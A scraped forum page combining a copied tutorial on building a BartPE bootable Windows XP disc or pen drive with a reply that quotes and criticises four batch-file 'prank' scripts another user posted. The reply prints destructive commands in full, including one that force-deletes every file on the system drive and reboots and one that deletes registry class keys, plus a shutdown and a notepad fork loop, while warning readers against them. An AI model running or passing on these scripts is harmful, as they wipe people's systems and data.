xisto Community
Sign in to follow this  
vijethk

How To Install Windows Xp On Your Cd/dvd/pen Drive Easy and fun

How to Install Windows XP on your CD/DVD/Pen drive

This article will show you how to install Windows XP on your CD/DVD/USB Pen drive/ Flash Drive/ thumb Drive

Requirements:-

1) Windows XP CD or Windows XP Setup Information

2) Blank CD or DVD

or

2) USB Pen Drive Minimum of 1 GB (disk space necessary 256 MB or less)

3) BART PE builder software.

Procedure:-

1) Make sure that your system has about 500MB of free disk space!

2) Download the latest PE Builder version (self-installing package) and install it.

3) Start PE Builder (pebuilder.exe). When you start PE Builder for the first time it will ask if you agree with the license agreement.

4) Now PE Builder will ask to search for windows installation files. If you don't have your windows XP setup/installation files on your system you must insert the original Microsoft Windows XP installation/setup CD at this point.

The files you have at c:\windows are not installation files. They are your already installed files!

Click "yes" to start searching. PE Builder will now search all fixed- and CD-Rom drives for Windows installation files. This will take some time. When more than one valid location is found, a dialog will appear where you can select which location you want to use.

5)

For making Bootable CD/DVD

At the main PE Builder dialog, select the "Burn to CD/DVD" option. When you are using an erasable medium, make sure that the "AutoErase RW" option is enabled. The "burn using" option should be set to "StarBurn". Select your CD writer device from the Device list.

Hit the "build" button. PE Builder will now ask you to create a BartPE directory, answer with "yes".

The license for your Microsoft Windows XP product is shown. Read it and agree to it to continue.

PE Builder will now start building BartPE. This will take a few minutes.

You will see a lot of files getting copied and/or decompressed, the ISO image build and the data recorded to your CD/DVD writer.

If the data verify was correct and there where no errors reported you can boot the CD/DVD!

6)

For making bootable Pen Drive

Follow the above instructions and copy the files to the pen drive.

Enjoy your new preinstalled XP environment and use it for system Rescue Purposes...

Notice from rvalkass:

Anything you copy must be put in QUOTE tags.

Source: http://www.webhosting.uk.com/forums/

Post #7Neurotical Squirrel

Group: [HOSTED]
Member No.: 2,127

First off, these 4 are not related to VBS, or VBScript, in any way... Code this user posted in the following 4 "pranks" is actually a command intrepreter code, that is written in old fashioned batch files, or .BAT files... These were used in DOS days, to speed up certain tasks that repeated often, a sort of equivalent of the maros...

QUOTE(GaMeRrEmAg @ Dec 9 2007, 12:46 AM) *
*NOTE* these codes do not stay on forever, they just stay on until the person shuts off the computer.

This one is a lie, except in case of BAT-1 code, that I will elaborate on later in this post...

I believe this user has posted truely malicious code here, and that these dangerous ones should be removed, and the true prank ones left here...

BAT-1
CODE
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

This one will actually mess Windows up! It will delete ALL the files from your system hard drive, or system partition!

Command DEL is used (naturally) to delete files, %systemdrive% tells this command to wipe out everything from the partition you have your windows installed to (for example, C:), \*.* tells it to wipe every file it finds, and the switches /F /S /Q tell the command to force the deletion of read-only files, to wipe out every sub-directory, and to be quiet about it, respectively... This part is not at all a prank, and I don't recommend anyone trying this one... Ever...

BAT-2
-Stupidity Shutdown
*This pops up a funny message then will shutdown the computer

CODE
@echo off
msg * Fatal system error due to admin stupidity!
shutdown -c "Error! You are too stupid!" -s -t 10
Ok, this one really does send the message, but it sends this message to everyone on the network... MSG command is used to send short text messages between two or more computers on the network, mainly local network... MSG * will send the message to all the computers in the network... Not really funny, but hey... It's at least not malicious...

BAT-3
-Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]
*This will delete key registry files, then loops a message* (CANNOT BE RECOVERED FROM)

CODE
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fcked. Have a nice day.
GOTO MESSAGE

This one is just as bad, as the first one... It wipes out entire HKEY_CLASSES_ROOT registry section, and effectively kills your Windows... And again, it's a command-prompt style batch file... But, none the less, it's very malicious, and should NOT be tried...

BAT-4
-Endless Notepads
*This will pop up endless notepads until the computer freezes and crashes*
CODE
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
This one is not malicous, as it will only start notepads, until you run out of memory... Then windows will crash... Can be tried on someone I guess...

It appears to me, that this user has copied this code from some site, and has no real coding experience, and is, what would be called a wannabe-hacker... Probably some kid, with too much time on his hands... I would STRONGLY recommend that you avoid using BAT-1 and BAT-3 codes, as they WILL kill your computer, and you won't be able to revive your system without reinstallation... BAT-1 will destroy ANY file found on your system hard drive, and probably all files in your My Documents folder, as this folder is also stored on your system hard drive or partition...
Yeh I agree with this i know alot of batch code and kix that will destroy networks, don't underestimate these languages there not as historic as you think, especially when integrated into new technologies. But a unix command can be used to tear down anything in the world.